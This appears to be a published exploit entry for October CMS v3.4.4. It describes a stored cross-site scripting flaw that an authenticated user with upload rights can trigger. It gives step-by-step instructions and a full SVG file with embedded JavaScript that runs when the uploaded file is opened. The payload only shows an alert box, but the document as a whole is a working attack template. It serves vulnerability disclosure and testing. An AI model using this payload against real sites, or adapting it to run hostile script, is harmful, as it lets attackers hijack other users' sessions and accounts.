#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)#Date: 29 June 2023#Exploit Author: Okan Kurtulus#Vendor Homepage: https://octobercms.com#Version: v3.4.4#Tested on: Ubuntu 22.04#CVE : N/A# Proof of Concept:1– Install the system through the website and log inwithany user withfile upload authority.2– Select "Media"in the top menu. Prepare an SVG file using the payload below.3– Upload the SVG fileand call the relevant filefrom the directory it isin. XSS will be triggered.#Stored XSS Payload:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN""http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">
alert(1);</script></svg>
